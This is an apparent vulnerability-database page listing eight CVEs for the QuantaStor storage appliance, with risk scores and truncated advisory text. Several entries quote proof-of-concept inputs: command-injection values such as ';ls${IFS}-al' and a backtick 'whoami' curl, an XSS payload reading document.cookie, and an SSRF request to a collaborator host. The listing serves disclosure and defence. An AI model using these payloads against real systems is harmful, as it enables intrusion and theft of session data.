VYPR

Quantastor

by Nexus Concepts

CVEs (8)

  • CVE-2021-4406CriJul 10, 2023
    risk 0.59cvss 9.1epss 0.01

    An authenticated attacker is able to create alerts that trigger a stored XSS attack. POC * go to the alert manager * open the ITSM tab * add a webhook with the URL/service token value ' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters) * …

  • CVE-2021-42081CriJul 10, 2023
    risk 0.59cvss 9.1epss 0.01

    An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-…

  • CVE-2021-42083HigJul 10, 2023
    risk 0.57cvss 8.7epss 0.00

    An authenticated attacker is able to create alerts that trigger a stored XSS attack. POC * go to the alert manager * open the ITSM tab * add a webhook with the URL/service token value ' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters) * …

  • CVE-2021-42082HigJul 10, 2023
    risk 0.51cvss 7.8epss 0.00

    Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'

  • CVE-2021-42080HigJul 10, 2023
    risk 0.48cvss 7.4epss 0.01

    An attacker is able to launch a Reflected XSS attack using a crafted URL. POC: Visit the following URL https://:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>

  • CVE-2017-9979MedAug 28, 2017
    risk 0.43cvss 6.1epss 0.03

    On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be triggered containing the invalid method previously invoked. The response sent to the user isn't sanitized in this case. An attacker can leverage this issue by…

  • CVE-2021-42079MedJul 10, 2023
    risk 0.40cvss 6.2epss 0.01

    An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOS…

  • CVE-2017-9978MedAug 28, 2017
    risk 0.38cvss 5.3epss 0.05

    On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, a flaw was found with the error message sent as a response for users that don't exist on the system. An attacker could leverage this information to fine-tune and enumerate valid accounts on the system by searching for…